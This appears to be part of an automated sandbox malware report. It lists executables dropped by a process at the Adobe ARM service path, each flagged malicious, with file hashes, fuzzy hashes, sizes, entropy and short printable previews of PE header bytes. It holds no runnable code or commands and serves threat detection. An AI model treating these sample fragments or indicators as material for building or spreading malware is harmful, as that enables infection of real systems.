                                                                                                                                                                                                                            SHA-512:DE64E9823385AFA0141D9B58141808B15F85BC7D4B536C32D428D4F5542A0C394E3996453F00B6A99DEF025BF504A672DDF771DA79C69BB191921891D31AC4EC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................. ........... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc....... ......................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1339904
                                                                                                                                                                                                                            Entropy (8bit):7.200852307538492
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:GjKTIsAjFuvt9fmFthMaT5U8aChaeu4GJ0eeQ2yPyzc+E7xonyVGc/dT5N:GjI/mPh7TT79mJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:FCBC3A11A8C5943E3D3747B8BBBD9AA9
                                                                                                                                                                                                                            SHA1:59092017157133B05C1C33BA8AA4F51B59F075E8
                                                                                                                                                                                                                            SHA-256:E9688DE09152E58A3677530F0C2B79DFBACCD5321436A8D26975A0C82984FCB7
                                                                                                                                                                                                                            SHA-512:1FA6F14AD05939E15FDC256F3D19C0B4B6FC60F0352908B33BBFBC4160A7E8A06ECE9D4B008CF7353DAD7A361DA7E1DCFEEF22445A5E53FCF21B6CA207363197
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1622016
                                                                                                                                                                                                                            Entropy (8bit):5.12522131216621
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7GqVwCto1Om5WgsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:qZ1OmUkJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:137E7AD51FD82CA102C5165A75C83643
                                                                                                                                                                                                                            SHA1:05A3BF0CF953763B5785A3E1B97CF7F9C007C657
                                                                                                                                                                                                                            SHA-256:46630BA4692684AC35DECC1E77E935510C99BE42AEB1079DE02C9C7D71129E7F
                                                                                                                                                                                                                            SHA-512:04CF0D00DE79EA4AD36A7FA37A92DE9BAF8F4BE1D284409F225545E6A74620A7E500ADD55363F273E463B11A1D1333CB65BC1480ABC0C49EE241B1156D346B74
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................#......].... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1359872
                                                                                                                                                                                                                            Entropy (8bit):4.824419982680039
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:vWBWSGJ0eeQ2yPyzc+E7xonyVGc/dT5N:jJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:682F582DCF554BB600D83BB3F395507E
                                                                                                                                                                                                                            SHA1:E852648AC3439F6FD5533779B1174DE09542CD6A
                                                                                                                                                                                                                            SHA-256:735155B24969CA0FAE7A93D2AFDA17DA7BD64513CD38A55828A88704513C8246
                                                                                                                                                                                                                            SHA-512:C510A0C9DC7CBE9589DD5261038CAF60DDC09A61827368C41D854DE44E0151A9D9672FC86D6EF567F8AF6209612F3B138D65213A1A1C4C8BE28D603AFEF11BF7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@....................................?..... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1683968
                                                                                                                                                                                                                            Entropy (8bit):7.221615376801191
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:p+GtCi27mVdyT+a0wJLeQVPyzc+E7xQ2l:cmd27V1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:AF4064BF32EC987F7E907713AE168824
                                                                                                                                                                                                                            SHA1:D497340E68B96D457FF16A5B7F27C90FC44907F7
                                                                                                                                                                                                                            SHA-256:F27387FA10FD400D80F031BE32FBBF283C1152CF9329A347571A48B8B4D57C39
                                                                                                                                                                                                                            SHA-512:53EB50D9DC4EB42D31DA1B964E5A46F2FABFAF3D0FEA7D75EF978061EE0E6FC6BE6537C84C13BC11580AD0F458278294F3354F11B81DDE3BE83B8574B1166908
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3110912
                                                                                                                                                                                                                            Entropy (8bit):6.647041563944508
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:zU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYrJLeQVPyzc+E7xQ2l:E9NfHOIK5Ns6qR9F1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:EC2668E0EF1D4A79DC086E41D4B2E764
                                                                                                                                                                                                                            SHA1:0E5BCA2FAA3320AF718C322492819AFA55AAC194
                                                                                                                                                                                                                            SHA-256:6904E6442675DA2AF543E73246DE032C490E6148C43B814E93363ECD1EF2CD98
                                                                                                                                                                                                                            SHA-512:9E50E8BC429C2125DE05045D4A28CF33C7FB24B0EA31586A34A52CCA92A72E3579F8EEA3848382E9A508E2BF1FEFE61749720AF8E887203E0456BE261B7EBBB0
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......"0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1694720
                                                                                                                                                                                                                            Entropy (8bit):5.254202617263401
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:SkIWTUQcydcGJ0eeQ2yPyzc+E7xonyVGc/dT5N:SxKU4JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:F0D322E5D52AA3F19C9DB8865916CCEC
                                                                                                                                                                                                                            SHA1:820F7D458392DAAF947E210D161DCDDE083BC690
                                                                                                                                                                                                                            SHA-256:283CA10A167DC1CCD5B3C90BA2223AD8A581C3C328FC45F254B2DB601EE0AFF6
                                                                                                                                                                                                                            SHA-512:58291A665DF19B6392DF3B360E9A6CEB766EBA2340769C803D9F69C87B4246D66D50664E7B9C6EA73E745DF76927EC4DEB1D986D08CE583BC281A8BD83D2EDB5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.............................0$......P.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc.......@......................@...................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1444864
                                                                                                                                                                                                                            Entropy (8bit):5.0296604713833615
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:WO+qBlGJ0eeQ2yPyzc+E7xonyVGc/dT5N:J+vJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:4227D2852A35FF7AB47B6DC98266BA3B
                                                                                                                                                                                                                            SHA1:9520106C32E0E885F4D792166FD7F0C3EDB9C0C0
                                                                                                                                                                                                                            SHA-256:BCEC67793ACB20880DE64EAF047CEC3CFCFD5E32442EB4B40A1AA5E33EB27078
                                                                                                                                                                                                                            SHA-512:3D4454145B00E2B11EF4ED0D6A66388B6DBFE427FC8B53FCC2DDC49E9DC790615291BA0554EBF0DC53A676306454F93721AA41DC157033A2CB4361E4A9B00CC3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..........................@ ......U..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1249792
                                                                                                                                                                                                                            Entropy (8bit):4.667593050633481
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:gGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:gGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:EC366720B504ECF20FAED6CB138B993D
                                                                                                                                                                                                                            SHA1:A14BB2D5D4E023D036DB95F26B4FED94063B216C
                                                                                                                                                                                                                            SHA-256:66794A1B09785CBAE629EEDB972AD9163D57976247067BA5D7380D57233E8F01
                                                                                                                                                                                                                            SHA-512:F4BC552FE20F762168818BAF4B6E1366C8AD900DB35408D8A04092D8B80355146253BB548CD94585A96DAB7B7EBBBA265E7CDE55E5A7A9F86C3A094DCBDDC4E4
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.............................`............ ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...............2..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1268224
                                                                                                                                                                                                                            Entropy (8bit):4.695894809391895
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:FnGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:RGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:C874B782DC216C2CADEEF293ACD77DBA
                                                                                                                                                                                                                            SHA1:72716FD2B8D4C0CC55D7707729028267A7B4AD6F
                                                                                                                                                                                                                            SHA-256:F21B9A12406A6E588EB6BD4ED4C665714A9CF120E8CA921FFDAE5095EA258EC3
                                                                                                                                                                                                                            SHA-512:86C9F31027ECCCE431B04924D87D6C4E1A63C3E3B8D30DC17A4CEB01A8B38C28F8B7BCDDCD57172D4AD27586D8849D4D2B9E971BCE5B9DFF63A9A4C3F652C77D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@....................................n..... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...............z..............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4151808
                                                                                                                                                                                                                            Entropy (8bit):6.496898623916114
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:ituUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755RJLeQVP5:ijEIa3HIEWOc5L1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:3E98CE7BF90290D4261B66C273184506
                                                                                                                                                                                                                            SHA1:9EE69EF0EDE139FA374BA5439526012F7678D4C2
                                                                                                                                                                                                                            SHA-256:4729BDA8594D75CE70AD77EB41670C9A3888CB453D2DC81CA5C0DC0E8096C09C
                                                                                                                                                                                                                            SHA-512:6961481671FA6111CF1A4401BA7F9AD38B7621DA71F8B3AB37A125967EB6B9913C8337B1539E140824CA27C0B275EFBD509E3DAF14A317C948E553C97E502978
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59941376
                                                                                                                                                                                                                            Entropy (8bit):7.999357812672546
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:1572864:DQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAsH:UXhwMhe6AABPiQwF6xQ22Rg
                                                                                                                                                                                                                            MD5:FBFCE69B548291E601CD57EB2A009C5D
                                                                                                                                                                                                                            SHA1:65E2C230373423966729BAC7E9DBE4DB208F35C5
                                                                                                                                                                                                                            SHA-256:F2B30B44D90CDA3976C41529F91B44E4427CD6544B6B318A6D61524FBFAA2994
                                                                                                                                                                                                                            SHA-512:C6910FABF66B1C2AB3915AA0AC3DCF88CB7A94EE3930C5628B0438B89365DC3794857A2DC9E46E07133E2D7CDC72BD9D93EBFD3614BF5A4D9FADD5A4323F6DC2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......j.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1336832
                                                                                                                                                                                                                            Entropy (8bit):4.843691316586923
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:GjkYuZGJ0eeQ2yPyzc+E7xonyVGc/dT5N:O/uUJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:E05290D5A475EE58F687E699C389BC70
                                                                                                                                                                                                                            SHA1:C9BD60C577A8BA5EBCCE98BB48305549734BE948
                                                                                                                                                                                                                            SHA-256:25215559DE1C4B8F5B991FD29B7A87605965772B0A7F0685567B862E9F0E5694
                                                                                                                                                                                                                            SHA-512:C0BED0F7D97D6A8736A86CA1C4CFA8FB365D626208D12774E917EA7FB54215BD8B5B8634719A3111E9236E8D2E676C68AEE673088E599A766F907072F2CE8242
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..................................&.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...............v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1491456
                                                                                                                                                                                                                            Entropy (8bit):5.0655249473002755
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:MxwSJzkrmZsdGJ0eeQ2yPyzc+E7xonyVGc/dT5N:MyIkrKsoJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:31BFA14A7571DD66AFDAECA51127EC3F
                                                                                                                                                                                                                            SHA1:11F97F4033B94967B4053A65E6EE3EF1DD741EDD
                                                                                                                                                                                                                            SHA-256:FF7D920A4185AC4CA76C7977ADAED194BFBF44D84F9BEBFFD0CA1A69666D5F4C
                                                                                                                                                                                                                            SHA-512:6855429BA104AB76E0A54B8F341308CC4F9B6402DCC3B04F0203E98DE7680BC5CC8176BDBD7CF185DDDC18F09D81C54189791564021EE7C156E6B467C857F79B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................!......#.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@...................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1755648
                                                                                                                                                                                                                            Entropy (8bit):5.362132667845523
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:CHQJLIRZvsnNqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:CHQJLy49JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:E9A5D2773EA4514F8AC304446A68549A
                                                                                                                                                                                                                            SHA1:8CB4F05513CCAFFED7E01B4B7FBFFF627A750D59
                                                                                                                                                                                                                            SHA-256:81D30ACCCAA32FE6BAFBC9DB4F108DE4F2437CF137CD16F2C621227915EEEC27
                                                                                                                                                                                                                            SHA-512:0C13F540C0202B2C2C5C9BB0B6D5D4FA0AE1AA2EDAA6245385D793314BBDFB9D2463B1233535DC934FAE93DC196735DE1890B6BE0099D0171B2CD80C3927BB1F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@............................. %......l.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5365760
                                                                                                                                                                                                                            Entropy (8bit):6.447829989550791
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:kUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kx:PWmXL6DE97dRpKuoQbgS1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:7616060CF043379D270020602C5C1375
                                                                                                                                                                                                                            SHA1:D0A33E1AB91E471C990FA6EA03A78C6554B7B35E
                                                                                                                                                                                                                            SHA-256:5AA534E0A95E23B4EFA4720506E5097CAC99D6D32BD53D5D5A8D1A0D5693E6B9
                                                                                                                                                                                                                            SHA-512:7291C83A9532827F2C4D20659795298AFA529A05807254F5112DE4060521E5E5CCC35EF9C1D27B3362EF24D342183D108B208C24CFCCB3E838D24000925F9357
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3163136
                                                                                                                                                                                                                            Entropy (8bit):7.971528501087099
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:drZ23AbsK6Ro022JjL2WEiVqJZx1vcbE7xQ2l:RJADmmxL2WEoCZx8m9
                                                                                                                                                                                                                            MD5:B340163BAF68C42443211E7F1F1DB8FD
                                                                                                                                                                                                                            SHA1:40D59B7AD87418BDEC4A895DF8C994CCD79A6196
                                                                                                                                                                                                                            SHA-256:D609839CA9C23B342082BBD9C8765978DA5EA4029A58D5D4429DAC7317FD6B6E
                                                                                                                                                                                                                            SHA-512:DE0F3B31289B13BC325F8681D36FBA1212C4072372ADE09F79EA1C6A151F4038487697B70AA51A66D78D1030C7F62077843DAA098F78C609140958A940104BD7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1..... ]0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1213440
                                                                                                                                                                                                                            Entropy (8bit):7.195972985337056
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:+frYY42wd7hlOE9fpkEE64tGJ0eeQ2yPyzc+E7xonyVGc/dT5N://9xrSYJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:87F91F16D71D094E49B989DDAD007596
                                                                                                                                                                                                                            SHA1:E8BF386C3C036901021F7862C2EC63E2A1CE65E0
                                                                                                                                                                                                                            SHA-256:0F0D13D3294EDF04029D12A449608FBB39AFB8441338FEE41DBEAD1DB9DFB40E
                                                                                                                                                                                                                            SHA-512:46C2369AFA0C0A7A532126037B678547F16FAFAB6E7219A6E86D424AC7C44A2609C200F5379FF4E07E3117CDDDA183C54C43B3A53FF5852A692B3F051567382F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
